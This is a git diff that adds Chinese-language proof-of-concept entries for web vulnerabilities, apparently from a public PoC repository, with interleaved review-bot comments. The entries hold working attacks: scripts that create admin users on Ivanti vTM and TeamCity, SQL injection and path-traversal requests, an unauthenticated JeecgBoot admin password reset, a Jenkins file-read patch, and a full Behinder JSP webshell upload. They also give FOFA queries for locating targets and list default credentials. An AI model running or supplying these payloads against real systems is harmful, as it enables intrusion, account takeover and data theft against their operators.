@@ -0,0 +1,53 @@ +# Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593) + +Ivanti Virtual Traffic Manager (vTM)多个版本存在身份验证绕过漏洞(CVE-2024-7593),由于身份验证算法的错误实现,导致未经身份验证的远程攻击者绕过面向互联网的vTM管理控制台上的身份验证,未授权创建管理用户。 + +## fofa + +```javascript +"Pulse Secure vTM Administration Server" +``` + +## poc + +```python +import requests + +# Set to target address +admin_portal = 'https://1.1.1.1:9090' + +# User to create +new_admin_name = 'ldwkadmin' +new_admin_password = 'ldwkadmin1234' + +requests.packages.urllib3.disable_warnings() +session = requests.Session() + +# Setting 'error' bypasses access control for wizard.fcgi. +# wizard.fcgi can load any section in the web interface. +params = { 'error': 1, + 'section': 'Access Management:LocalUsers' } + +# Create new user request +# _form_submitted to bypass CSRF +data = { '_form_submitted': 'form', + 'create_user': 'Create', + 'group': 'admin', + 'newusername': new_admin_name, + 'password1': new_admin_password, + 'password2': new_admin_password } + +# Post request +r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False) + +# View response +content = r.content.decode('utf-8') +print(content) + +if r.status_code == 200 and '2<' in content: + print("New user request sent") + print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'") +else: + print("Unable to create new user") +``` + diff --git a/JAVA-Public-CMS-后台RCE漏洞.md b/JAVA-Public-CMS-后台RCE漏洞.md new file mode 100644 index 0000000..e664de0 --- /dev/null +++ b/JAVA-Public-CMS-后台RCE漏洞.md @@ -0,0 +1,18 @@ +## JAVA Public CMS 后台RCE漏洞 +``` +下载地址:https://github.com/sanluan/PublicCMS/ +``` + +## 漏洞复现 +![](./assets/20231030204825883.png) + +![](./assets/20231030205452844.png) + +![](./assets/20231030205817368.png) + +![](./assets/20231030205843222.png) + +## 环境搭建和复现 +``` +https://mp.weixin.qq.com/s/MHNVFo6EK8CZtelMaGOBxA +``` 
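Review bot: `Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md` names the CVE but has no `影响版本` or fixed-version section, and `admin_portal = 'https://1.1.1.1:9090'` under the comment `Set to target address` should be an obvious placeholder. The script's own comments (`Setting 'error' bypasses access control for wizard.fcgi`, `_form_submitted to bypass CSRF`) are the actual technical description of the bug and belong in prose above the fence, where a defender can read the `/apps/zxtm/wizard.fcgi` endpoint and the `error` parameter without parsing Python.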
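Review bot: `JAVA-Public-CMS-后台RCE漏洞.md` contains only a download link, four screenshots and a link to the reproduction article; there is no description, affected version, endpoint or request, so the entry cannot be used for triage or detection without leaving the repo. At minimum copy the summary and affected version from the linked article, and state in the title's spirit that this is a post-authentication (`后台`) issue.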
diff --git a/JCGJHR-N835R后台存在命令执行.md b/JCGJHR-N835R后台存在命令执行.md new file mode 100644 index 0000000..c050dbc --- /dev/null +++ b/JCGJHR-N835R后台存在命令执行.md @@ -0,0 +1,27 @@ +# JCG JHR-N835R 后台存在命令执行 + +# 一、漏洞简介 +JCG JHR-N835R 后台存在命令执行,通过 ; 分割 ping 命令导致任意命令执行 + +# 二、影响版本 ++ JCG JHR-N835R + +# 三、资产测绘 ++ hunter`web.body="graphics/bottom.gif"` ++ 特征 + +![1700219199879-d6f8889d-692c-41ca-9223-e9669ff7cded.png](./img/P60bqolSQuyX5ldF/1700219199879-d6f8889d-692c-41ca-9223-e9669ff7cded-411046.png) + +# 四、漏洞复现 +1. 通过默认账号`admin/admin`登录 + +![1700219286833-d1c58fec-c420-48dd-ad6a-b35fdc0b3acd.png](./img/P60bqolSQuyX5ldF/1700219286833-d1c58fec-c420-48dd-ad6a-b35fdc0b3acd-436378.png) + +2. 在后台系统工具那使用 PING工具,使用 ; 命令执行绕过 + +![1700219376026-a9ecdf59-448c-4f65-a04c-0c74b905c7cd.png](./img/P60bqolSQuyX5ldF/1700219376026-a9ecdf59-448c-4f65-a04c-0c74b905c7cd-505558.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xq0kmca04hi8g2yd> \ No newline at end of file diff --git a/JEEWMS仓库管理系统任意文件读取漏洞.md b/JEEWMS仓库管理系统任意文件读取漏洞.md new file mode 100644 index 0000000..6bcb945 --- /dev/null +++ b/JEEWMS仓库管理系统任意文件读取漏洞.md 
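Review bot: in JCGJHR-N835R后台存在命令执行.md the 影响版本 section gives only the model name with no firmware version, and step 2 (`在后台系统工具那使用 PING工具,使用 ; 命令执行绕过`) relies entirely on a screenshot; name the firmware version and the page or form involved so the entry can be matched to a fix. The summary should also say explicitly that the issue is post-authentication and reached through the default credentials `admin/admin`, since changing that default password is the immediate mitigation.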
@@ -0,0 +1,22 @@ +## JEEWMS仓库管理系统任意文件读取漏洞 + +## fofa +``` +body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg==" +``` +![image](https://github.com/wy876/POC/assets/139549762/0fc82b26-4cd9-4924-b461-aa64aef53160) + +## poc +``` +GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 +Host: ip:port +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image](https://github.com/wy876/POC/assets/139549762/490b9323-3a5c-4f4a-8ca0-24e2f1ecbf6d) diff --git a/JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md b/JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md new file mode 100644 index 0000000..4ad415c --- /dev/null +++ b/JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# JEEWMS系统cgFormBuildController.do存在SQL注入漏洞 + +JEEWMS系统cgFormBuildController.do存在SQL注入漏洞 + +## fofa + +```javascript +body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" +``` + +## poc + +默认密码:admin/llg123 + +```javascript +GET /jeewms/cgFormBuildController.do?mobileForm&tableName='and/**/updatexml(1,concat(0x7e,user(),0x7e),1)and' HTTP/1.1 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Cookie: JSESSIONID=638E9021C7F71842BDAD39D26DD10E48; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +``` + +![image-20250220152053729](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502201520931.png) \ No newline at end of file 
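Review bot: in JEEWMS仓库管理系统任意文件读取漏洞.md the `## fofa` block joins two different queries with the word 或者 on one line (`body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg=="`), which is neither one valid query nor two; put them on separate lines. The entry also has no 漏洞来源 or affected-version section, unlike the other JEEWMS entries; add them. `Windows NT10.0` in the User-Agent is a typo for `Windows NT 10.0`.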
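Review bot: in JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md the opening paragraph only repeats the title; say which parameter is injectable (`tableName`, per the request), which versions are affected, and add a 漏洞来源 section as the cgReportController entry has. The `Cookie: JSESSIONID=638E9021C7F71842BDAD39D26DD10E48` value is a captured session id; replace it with a placeholder. The HTTP request is fenced as `javascript`; a plain or `http` fence is more accurate.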
diff --git a/JEEWMS系统cgReportController.do存在SQL注入漏洞.md b/JEEWMS系统cgReportController.do存在SQL注入漏洞.md new file mode 100644 index 0000000..a392e19 --- /dev/null +++ b/JEEWMS系统cgReportController.do存在SQL注入漏洞.md @@ -0,0 +1,32 @@ +# JEEWMS系统cgReportController.do存在SQL注入漏洞 + +JEEWMS系统cgReportController.do存在SQL注入漏洞 + +## fofa + +```javascript +body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" +``` + +## poc + +1. 构建 POC,登录后端捕获数据包,并替换 cookie + +```javascript +admin/llg123 +http://localhost:8083/jeewms/cgReportController.do?list&id=1 +``` + +1. 使用 SQLMAP 重现和构造执行语句 + +```javascript + python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db +``` + +![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211356436.png) + + + +## 漏洞来源 + +- [JEEWMS-cgReportController.do?List&ID 存在 SQL 注入漏洞 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFTVK) \ No newline at end of file diff --git a/JEEWMS系统commonController.do存在任意文件上传漏洞.md b/JEEWMS系统commonController.do存在任意文件上传漏洞.md new file mode 100644 index 0000000..aad219a --- /dev/null +++ b/JEEWMS系统commonController.do存在任意文件上传漏洞.md 
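Review bot: in JEEWMS系统cgReportController.do存在SQL注入漏洞.md both steps are numbered `1.` because the unindented code fences between them terminate the list; either indent the fences under the items or number them 1 and 2 explicitly. The first code block mixes credentials and a URL (`admin/llg123` and `http://localhost:8083/jeewms/cgReportController.do?list&id=1`) in one `javascript` fence; state the credentials in prose and keep only the URL in the fence. The 漏洞来源 link text (`...存在 SQL 注入漏洞 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com`) is a machine-translated page title; trim it to the issue id.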
@@ -0,0 +1,36 @@ +# JEEWMS系统commonController.do存在任意文件上传漏洞 + +JeeWMS是一款免费开源的仓库管理系统,支持3PL和厂内物流,涵盖订单管理,仓储管理,计费管理,现场作业,RFID,AGV等功能。本文介绍了系统的简介,功能,安装,截图和链接,适合仓储企业和开发者参考。JEEWMS系统commonController.do存在任意文件上传漏洞 + +## fofa + +```javascript +body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" +``` + +## poc + +```javascript +POST /jeewms/commonController.do?parserXml HTTP/1.1 +Host: localhost:8083 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 +Cookie: JSESSIONID=F571DC569F0A3DC553D8D25ACA42D570; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1713256699,1713260101 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHRhkXyQjTSAk8j8c +Content-Length: 792 + + +------WebKitFormBoundaryHRhkXyQjTSAk8j8c +Content-Disposition: form-data; name="file"; filename="hai.jsp" +Content-Type: image/png + +<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> +------WebKitFormBoundaryHRhkXyQjTSAk8j8c-- +``` + +![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211354702.png) + +![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211354338.png) + +## 漏洞来源 + +- [JEEWMS-commonController.do?存在用于文件上传的 ParserXML ·问题 #IBFTZ7 ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFTZ7) \ No newline at end of file 
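Review bot: in JEEWMS系统commonController.do存在任意文件上传漏洞.md the request body is a complete 冰蝎 (Behinder) JSP webshell with its default key, which is far more than is needed to show that `commonController.do?parserXml` accepts an arbitrary `.jsp` upload; a harmless marker file (a `.jsp` that prints a fixed string) demonstrates the same defect and is what a defender can safely reuse as a regression test. The description also contains a sentence pasted from a search snippet (`本文介绍了系统的简介,功能,安装,截图和链接,适合仓储企业和开发者参考`) that does not belong in a vulnerability entry, and `Content-Length: 792` will not match the pasted body; drop the header or note that it must be recomputed.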
diff --git a/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md b/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md new file mode 100644 index 0000000..688fcd4 --- /dev/null +++ b/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md @@ -0,0 +1,21 @@ +# JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞 + +JeeWMS是一款免费开源的仓库管理系统,支持3PL和厂内物流,涵盖订单管理,仓储管理,计费管理,现场作业,RFID,AGV等功能。本文介绍了系统的简介,功能,安装,截图和链接,适合仓储企业和开发者参考。厦门市灵鹿谷科技有限公司JEEWMS dynamicDataSourceController.do JDBC反序列化漏洞,导致攻击者可以获取系统主机权限 + +## fofa + +```javascript +body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" +``` + +## poc + +```javascript +GET /rest/../dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://{{tempdns}}/test?detectCustomCollations=true%26autoDeserialize=true&dbUser=test_user HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +``` + +利用工具:https://github.com/fnmsd/MySQL_Fake_Server + diff --git a/JEEWMS系统graphReportController.do存在SQL注入漏洞.md b/JEEWMS系统graphReportController.do存在SQL注入漏洞.md new file mode 100644 index 0000000..f570e03 --- /dev/null +++ b/JEEWMS系统graphReportController.do存在SQL注入漏洞.md 
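Review bot: in JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md the request path is `/rest/../dynamicDataSourceController.do`, but the text never says why the `/rest/../` prefix is there, i.e. whether it is what lets the request reach the controller without a session; state that explicitly, because it decides whether the mitigation is to fix the authentication filter or to restrict the datasource-test endpoint. The same pasted marketing sentence (`本文介绍了系统的简介...`) appears here as in the commonController entry and should go, and the entry lacks the 漏洞来源 section the sibling JEEWMS entries have.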
@@ -0,0 +1,31 @@ +# JEEWMS系统cgReportController.do存在SQL注入漏洞 + +JEEWMS系统cgReportController.do存在SQL注入漏洞 + +## fofa + +```javascript +body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" +``` + +## poc + +默认密码 admin/llg123 + +``` +GET /jeewms/graphReportController.do?datagridGraph&configId=CWSYL&store_code=1' HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +``` + +```javascript +python sqlmap.py -u "http://localhost:8083/jeewms/graphReportController.do?datagridGraph&configId=CWSYL&store_code=1" --cookie="JSESSIONID=B0A3B7BC426F86462B08A69CA6F88FF9; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1713256699,1713260101" -p store_code --current-db +``` + +![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211400590.png) + +## 漏洞来源 + +- [JEEWMS-graphReportController.do?# store_comde 中存在 SQL 注入漏洞 ·问题 #IBFK93 ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFK93) + diff --git a/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md b/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md new file mode 100644 index 0000000..d46ae5b --- /dev/null +++ b/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md @@ -0,0 +1,22 @@ +## JFinalCMS 任意文件读取漏洞(CVE-2023-41599) + + +## 特征 +``` +fofa: +body="content=\"JreCms" + +hunter: +web.body="content=\"JreCms" +``` +## POC +``` +Windows: /../../../../../../../../../test.txt +Linux: /../../../../../../../../../etc/passwd + +/common/down/file?filekey=/../../../../../../../../../etc/passwd +``` + + +## 漏洞分析 +http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/ diff --git a/JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md b/JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md new file mode 100644 index 0000000..5348e17 --- /dev/null +++ b/JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md 
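Review bot: the heading and first paragraph of JEEWMS系统graphReportController.do存在SQL注入漏洞.md both say `cgReportController.do`, copied from the sibling entry, while the file name, the request (`graphReportController.do?datagridGraph&configId=CWSYL&store_code=1'`) and the Gitee issue all refer to graphReportController.do; fix the heading and summary. The sqlmap line also embeds a captured `JSESSIONID=B0A3B7BC426F86462B08A69CA6F88FF9` cookie; use a placeholder. The 漏洞来源 link text contains `store_comde`, which looks like a typo in the transcribed issue title.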
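Review bot: JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md has no affected-version or fixed-version information, and the 漏洞分析 section is a bare URL; add the version range from the CVE record and a one-line description of the root cause so the entry stands on its own. The `Windows:` and `Linux:` lines in the POC block are explanation, not part of the request; move them to prose above the `/common/down/file?filekey=...` line.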
@@ -0,0 +1,32 @@ +# JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307) + +JeecgBoot v3.7.1被发现包含通过组件/onlDragDatasetHead/getTotalData的SQL注入漏洞。 + +## fofa + +```javascript +body="jeecg-boot" +``` + +## poc + +```javascript +POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 +Host: localhost:8090 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Type: application/json +Content-Length: 284 + +{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}} +``` + +![image-20241128101830162](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281018255.png) + +## 漏洞来源 + +- https://github.com/jeecgboot/JeecgBoot/issues/7237 diff --git a/JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md b/JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md new file mode 100644 index 0000000..143deaa --- /dev/null +++ b/JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md 
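Review bot: JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md names v3.7.1 as affected but not the version that fixes it; add it, and turn the 漏洞来源 bullet into a titled link. The `Content-Length: 284` header must match the JSON body actually sent; either state that it is to be recomputed or drop it, as the sibling entries do.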
@@ -0,0 +1,25 @@ +# JeecgBoot系统接口passwordChange任意用户密码重置漏洞 + +Jeecg Boot是一个企业级低代码开发平台,基于前后端分离的架构,融合了SpringBoot、SpringCloud、Ant Design、Vue、Mybatis-plus、Shiro、JWT等多种主流技术,旨在帮助企业快速构建各种应用系统,提高开发效率,降低开发成本。 + +JeecgBoot系统接口passwordChange任意用户密码重置漏洞,未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +```javascript +body="/sys/common/pdf/pdfPreviewIframe" +``` + +## poc + +```javascript +GET /jeecg-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +``` + +![image-20241219145613854](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191456905.png) \ No newline at end of file diff --git a/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md b/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md new file mode 100644 index 0000000..8fe1259 --- /dev/null +++ b/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md 
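Review bot: JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md has no affected-version, fixed-version or 漏洞来源 section, and the summary does not say which check the endpoint omits that lets `smscode=&phone=` be empty; without that, readers cannot tell whether a given release is exposed or verify that a fix addresses it. Also use `http` or a plain fence for the request instead of `javascript`.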
@@ -0,0 +1,59 @@ +# Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044) + +Jenkins是一个开源的、提供持续集成服务(CI)的软件平台。Jenkins 使用 Remoting 库(通常为agent.jar或remoting.jar)实现控制器与代理之间的通信,该库允许代理从控制器加载类和类加载器资源,以便从控制器发送的 Java 对象(构建步骤等)可以在代理上执行。 + +**Jenkins Remoting任意文件读取漏洞(CVE-2024-43044)**,由于Remoting库ClassLoaderProxy#fetchJar方法没有限制代理请求从控制器文件系统读取的路径,可能导致**拥有Agent/Connect权限**的攻击者从Jenkins控制器文件系统读取任意文件(如凭证、配置文件等敏感信息)并进一步利用导致远程代码执行。 + +## fofa + +```javascript +app="Jenkins" +``` + +## poc + +通过`http://ip:port/jnlpJars/agent.jar`下载jar包 + +修改`\hudson\remoting\RemoteClassLoader.class`对应代码 + +![image-20240905091939652](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050919209.png) + +```java + +try { + Scanner scanner = new Scanner(System.in); + System.out.print("输入读取文件path:"); + String inputText = scanner.nextLine(); + System.out.println("尝试读取:" + inputText); + URL jarFileUrl = new URL("file:///" + inputText); + byte[] fileContent = this.proxy.fetchJar(jarFileUrl); + String contentAsString = new String(fileContent, StandardCharsets.UTF_8); + System.out.println("文件内容:\n" + contentAsString); +} catch (Exception var10) { + System.out.println("WRONG:" + var10); +} +``` + +需提前获悉node的密钥和名称 + +![image-20240905092102978](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050921039.png) + +```java +java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx> +``` + +![image-20240905092434004](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050924072.png) + +### exp + +``` +https://github.com/convisolabs/CVE-2024-43044-jenkins +``` + + + +## 漏洞来源 + +- https://forum.butian.net/article/559 +- https://github.com/v9d0g/CVE-2024-43044-POC +- https://github.com/convisolabs/CVE-2024-43044-jenkins \ No newline at end of file diff --git a/JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md b/JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md new file mode 100644 index 0000000..8418a2d --- /dev/null +++ b/JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md 
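Review bot: in Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md the second ```java fence contains a shell command (`java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>`), not Java; fence it as shell. The summary names the root cause (`ClassLoaderProxy#fetchJar` not restricting the path) but not the affected or fixed Jenkins versions; add them from the Jenkins advisory. The patched `RemoteClassLoader` snippet uses `Scanner`, `URL` and `StandardCharsets` without showing the imports; say they are needed or that the class already has them. Since the prerequisite is the Agent/Connect permission plus a node secret (需提前获悉node的密钥和名称), it is worth stating next to that line that limiting who holds the permission reduces exposure until the upgrade.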
@@ -0,0 +1,58 @@ +## JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198) + +JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。 + +## fofa +``` +body="Log in to TeamCity" +``` + +## poc +```python +import requests +import urllib3 +import argparse +import re +urllib3.disable_warnings() + +parser = argparse.ArgumentParser() +parser.add_argument("-t", "--target",required=True, help="Target TeamCity Server URL") +parser.add_argument("-u", "--username", required=True,help="Insert username for the new user") +parser.add_argument("-p", "--password",required=True, help="Insert password for the new user") +args = parser.parse_args() + +vulnerable_endpoint = "/pwned?jsp=/app/rest/users;.jsp" # Attacker’s path to exploit CVE-2024-27198, please refer to the Rapid7's blogpost for more information + +def check_version(): + response = requests.get(args.target+"/login.html", verify=False) + repattern = r'<span class="vWord">Version</span>(.+?)</span>' # Regex pattern to extract the TeamCity version number + try: + version = re.findall(repattern, response.text)[0] + print("[+] Version Found:", version) + except: + print("[-] Version not found") + +def exploit(): + response = requests.get(args.target+vulnerable_endpoint, verify=False, timeout=10) + http_code = response.status_code + if http_code == 200: + print("[+] Server vulnerable, returning HTTP", http_code) # HTTP 200 Status code is needed to confirm if the TeamCity Server is vulnerable to the auth bypass vuln + create_user = { + "username": args.username, + "password": args.password, + "email": f"{args.username}@mydomain.com", + "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}, # Given admin permissions to your new user, basically you can have complete control of this TeamCity Server + } + headers = {"Content-Type": "application/json"} + 
create_user = requests.post(args.target+vulnerable_endpoint, json=create_user, headers=headers, verify=False) # POST request to create the new user with admin privileges + if create_user.status_code == 200: + print("[+] New user", args.username, "created succesfully! Go to", args.target+"/login.html to login with your new credentials :)") + else: + print("[-] Error while creating new user") + + else: + print("[-] Probable not vulnerable, returning HTTP", http_code) + +check_version() +exploit() +``` diff --git a/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md b/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..8b3235e --- /dev/null +++ b/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md 
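Review bot: in JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md the summary's last two sentences (`...为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码`) are garbled and describe code execution, whereas the rest of the entry is about authentication bypass and admin-user creation; rewrite them and add the affected and fixed TeamCity versions, which the text only alludes to as 新版本. In the script, `check_version()` extracts the version but nothing uses it, so the tool cannot tell a patched server from a vulnerable one before sending requests; also `succesfully` should be `successfully`, `Probable not vulnerable` should be `Probably not vulnerable`, and the bare `except:` should be `except IndexError:`.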
@@ -0,0 +1,67 @@ +## JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞 + +JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 + +## fofa + +```yaml +title="JieLink+智能终端操作平台" +``` + +## poc + +``` +POST /report/ParkChargeRecord/GetDataList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, \*/\*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Authorization: Bearer test +Cookie: JSESSIONID=test;UUID=1; userid=admin +X-Requested-With: XMLHttpRequest +Content-Length: 21 +Origin: http://x.xx.xx.x:xxx +Connection: close +Referer: http://x.xx.xx.x:xxx/Report/ParkOutRecord/Index +Sec-GPC: 1 +Priority: u=1 + +page=1&rows=20000 +``` + +``` +GET /Report/ParkCommon/GetParkInThroughDeivces HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, \*/\*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Origin: +Connection: close +Referer: +Sec-GPC: 1 +``` + +``` +GET /report/ParkOutRecord/GetDataList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, \*/\*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Authorization: Bearer test +Cookie: JSESSIONID=test;UUID=1; userid=admin +X-Requested-With: XMLHttpRequest +Content-Length: 2 +Origin: +Connection: close +Referer: +Sec-GPC: 1 +Priority: u=1 +``` + 
